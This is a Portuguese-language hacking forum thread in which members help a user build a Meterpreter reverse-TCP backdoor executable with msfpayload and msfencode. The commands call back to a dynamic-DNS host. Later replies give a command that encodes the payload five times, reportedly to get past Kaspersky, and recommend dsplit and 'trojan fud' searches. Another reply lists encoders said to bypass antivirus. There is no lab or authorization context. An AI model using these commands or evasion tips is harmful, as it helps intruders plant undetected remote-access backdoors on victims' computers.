Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: [metasploit] - msfencode - problemas

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Posts
    2

    Default [metasploit] - msfencode - problemas

    Ola amigos.. sou novo no forum e preciso d uma ajuda

    ao tentar gerar meus backdoor apresenta problemas com o msfencode aponta varios erros e no final o meu arquivo nao e gerado. sera que alguem pode me ajudar??

    segue abaixo oque acontece :

    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=host.sytes.net LPORT=444 X | msfencode -c 2 -o backdoor.exe
    Created by msfpayload (Penetration Testing | The Metasploit Project).
    Payload: windows/meterpreter/reverse_tcp
    Length: 290
    Options: LHOST=host.sytes.net,LPORT=444[*] x86/shikata_ga_nai succeeded with size 37917 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 37946 (iteration=2)

    [-] x86/shikata_ga_nai failed: The .text section is too small to be usable ["/opt/metasploit3/msf3/lib/msf/util/exe.rb:175:in `to_win32pe'", "/opt/metasploit3/msf3/msfencode:225:in `block in <main>'", "/opt/metasploit3/msf3/msfencode:192:in `each'", "/opt/metasploit3/msf3/msfencode:192:in `<main>'"][*] cmd/generic_sh succeeded with size 37888 (iteration=1)
    [*] cmd/generic_sh succeeded with size 37888 (iteration=2)

    [-] cmd/generic_sh failed: The .text section is too small to be usable ["/opt/metasploit3/msf3/lib/msf/util/exe.rb:175:in `to_win32pe'", "/opt/metasploit3/msf3/msfencode:225:in `block in <main>'", "/opt/metasploit3/msf3/msfencode:192:in `each'", "/opt/metasploit3/msf3/msfencode:192:in `<main>'"][*] ppc/longxor succeeded with size 37964 (iteration=1)
    [*] ppc/longxor succeeded with size 38040 (iteration=2)

    esses erros vao se repetindo e no final nao consigo gerar meu arquivo..

    Agradeco antecipadamente a ajuda.

  2. #2
    Moderator firebits's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    353

    Default re: [metasploit] - msfencode - problemas

    1) tente atualizar seu metasploit
    # cd /pentest/exploit/framework3
    # svn update

    2) tenho reparado nos erros, como por exemplo:

    [-] x86/shikata_ga_nai failed:
    The .text section is too small to be usable ["/opt/metasploit3/msf3/lib/msf/util/exe.rb:175:in `to_win32pe'",
    "/opt/metasploit3/msf3/msfencode:225:in `block in <main>'",
    "/opt/metasploit3/msf3/msfencode:192:in `each'",
    "/opt/metasploit3/msf3/msfencode:192:in `<main>'"]
    [*] cmd/generic_sh succeeded with size 37888 (iteration=1)

    Metasploit 3 é feito em Ruby. Esse erros são do compliador em Ruby.Veja que neste erro, por exemplo:

    "/opt/metasploit3/msf3/msfencode:192:in `each'",

    Ele fala na Pasta opt que contém a pasta metasploit3 que contém a pasta msf3 que contém o arquivo msfencode tem um erro na linha 192, no comado da linguagem Ruby chamado each

    mas no backtrack 4 final pwance, nós usamos o caminho /pentest/exploit/framework3 para metasploit 3.3.4 e este erro é quando é instalado um binário neste link http://www.metasploit.com/releases/f...nux-x86_64.run e é tornado executável e extraido/instalado com o comando:

    # chmod +x framework-3.3.3-linux-x86_64.run
    # sh framework-3.3.3-linux-x86_64.run

    3) nos erros, quando aparecer o sinal [-] quer dizer = não funcionou e [*]quer dizer = funcionou, mas as vezes um componente depende de outro como payload shikata_ga_nai, não funcionou, não deu continuidade ao processo.

    [-] x86/shikata_ga_nai failed:

    4)Caso tenha problemas mesmo depois da atualização do Metasploit, conforme 1), faça o download do BINÁRIO http://www.metasploit.com/releases/f...nux-x86_64.run e instale conforme 2) e vá usando via /opt mesmo.

    O Backtrack 4 final está passando por um momento de modificação e desenvolvimento então é norma algumas coisas assim acontecerem.

    Se você conseguiu soluções diferentes desta, post aqui.

  3. #3
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default re: [metasploit] - msfencode - problemas

    No comando que você aplicou:

    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=host.sytes.net LPORT=444 X | msfencode -c 2 -o backdoor.exe

    Troque o X por R, pois o X significa eXecutable, o R de Raw, no msfenode você já especifica que saida será um .exe com a opção -o, não sendo necessário usar o X.

    Ficando assim:

    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=host.sytes.net LPORT=444 R | msfencode -c 2 -o backdoor.exe

    E quanto a porta, é a 444 mesmo, não seria a porta default que é 4444?

    Obs.: Lembrando que este simples encode gerado pelo shikata_ga_nai já é detectado pela grande maioria dos antivirus!

    Abraços!

    (espreto)
    ®
    (gdb) disass m(y_br)ain

    ®

  4. #4
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default re: [metasploit] - msfencode - problemas

    Errado!

    Ele fala na Pasta opt que contém a pasta metasploit3 que contém a pasta msf3 que contém o arquivo msfencode tem um erro na linha 192, no comado da linguagem Ruby chamado each

    mas no backtrack 4 final pwance, nós usamos o caminho /pentest/exploit/framework3 para metasploit 3.3.4 e este erro é quando é instalado um binário neste link http://www.metasploit.com/releases/f...nux-x86_64.run e é tornado executável e extraido/instalado com o comando...
    No backtrack 4 final ele usa sim o seguinte caminho /opt/metasploit3/msf3 o que acontece é que é criado um link simbolico para o caminho /pentest/exploits/framework3/.

    Só alertando que o link que foi passado acima para o download do framework, o link é para sistemas 64bits!

    Espreto
    ®
    (gdb) disass m(y_br)ain

    ®

  5. #5
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default re: [metasploit] - msfencode - problemas

    Quote Originally Posted by br4d0ck View Post
    Ola amigos.. sou novo no forum e preciso d uma ajuda

    ao tentar gerar meus backdoor apresenta problemas com o msfencode aponta varios erros e no final o meu arquivo nao e gerado. sera que alguem pode me ajudar??

    segue abaixo oque acontece :

    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=host.sytes.net LPORT=444 X | msfencode -c 2 -o backdoor.exe
    Created by msfpayload (Penetration Testing | The Metasploit Project).Payload: windows/meterpreter/reverse_tcp
    Length: 290
    Options: LHOST=host.sytes.net,LPORT=444[*] x86/shikata_ga_nai succeeded with size 37917 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 37946 (iteration=2)

    [-] x86/shikata_ga_nai failed: The .text section is too small to be usable ["/opt/metasploit3/msf3/lib/msf/util/exe.rb:175:in `to_win32pe'", "/opt/metasploit3/msf3/msfencode:225:in `block in <main>'", "/opt/metasploit3/msf3/msfencode:192:in `each'", "/opt/metasploit3/msf3/msfencode:192:in `<main>'"][*] cmd/generic_sh succeeded with size 37888 (iteration=1)
    [*] cmd/generic_sh succeeded with size 37888 (iteration=2)

    [-] cmd/generic_sh failed: The .text section is too small to be usable ["/opt/metasploit3/msf3/lib/msf/util/exe.rb:175:in `to_win32pe'", "/opt/metasploit3/msf3/msfencode:225:in `block in <main>'", "/opt/metasploit3/msf3/msfencode:192:in `each'", "/opt/metasploit3/msf3/msfencode:192:in `<main>'"][*] ppc/longxor succeeded with size 37964 (iteration=1)
    [*] ppc/longxor succeeded with size 38040 (iteration=2)

    esses erros vao se repetindo e no final nao consigo gerar meu arquivo..

    Agradeco antecipadamente a ajuda.
    los datos inputed en msfencode debe ser en bruto para las tuberías antes de la carga útil en el codificador de poner la opción R en el comando de carga útil. ¡Buena suerte. I tried translating whit google so sorry for the gramatics and I hope it helps.

  6. #6
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default re: [metasploit] - msfencode - problemas

    O Ruby gems esta instalado ?

  7. #7
    Just burned his ISO
    Join Date
    May 2010
    Posts
    2

    Default re: [metasploit] - msfencode - problemas

    ola galera, atualizei o backtrack fiz o teste hoje, troquei o X pelo R e consegui gerar o executavel..

    qual encode vcs recomendam para deixar indetect pela maioria dos avs , ja que o shikata_ga é facilmente reconhecido ?

  8. #8
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default re: [metasploit] - msfencode - problemas

    Quote Originally Posted by br4d0ck View Post
    ja que o shikata_ga é facilmente reconhecido ?
    # msfpayload windows/meterpreter/reverse_tcp LHOST=host.sytes.net LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe > backdoor.exe

    para o kaspersky bastou "encodar" 5x que ele n detectou mais nada, na net ainda vc pode procurar pelo dsplit e remover a assinatura viral, faça pesquisas por "trojan fud"

    segue o video tutorial que fiz para um amigo

    hxxp://www.vimeo.com/11672809
    Last edited by spawn; 05-17-2010 at 09:41 PM.

  9. #9
    Moderator firebits's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    353

    Default re: [metasploit] - msfencode - problemas

    há também estes, que são específicos para bypass AV:

    avoid_utf8_tolower
    shikata_ga_nai
    alpha_mixed
    alpha_upper
    call4_dword-xor
    countdown
    fnstenv_mov
    jmp_call_additive
    nonalpha
    nonupper
    unicode_mixed
    unicode_upper
    alpha2

  10. #10
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default re: [metasploit] - msfencode - problemas

    Uma pequena dica: toda vez que você quiser codificar uma carga não tentar usar o modelo built-in.
    Tente testar o modelo, sem qualquer capacidade de carga VirusTotal - Free Online Virus and Malware Scan e mostra infectados. Portanto, não usar qualquer modelo. Sorry for gramatical errors but I translated it on google.
    Cheers

Page 1 of 2 12 LastLast

Similar Threads

  1. msfencode ??
    By BurningDownBabylon in forum Beginners Forum
    Replies: 3
    Last Post: 05-12-2010, 10:35 AM
  2. ./msfencode ?
    By loop4me in forum OLD BackTrack 4 Software Related Issues
    Replies: 14
    Last Post: 03-10-2010, 12:16 AM
  3. msfencode
    By 100%digital in forum Beginners Forum
    Replies: 2
    Last Post: 03-03-2010, 06:19 PM
  4. msfpayload/msfencode
    By spawn in forum OLD Pentesting
    Replies: 4
    Last Post: 10-02-2009, 01:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •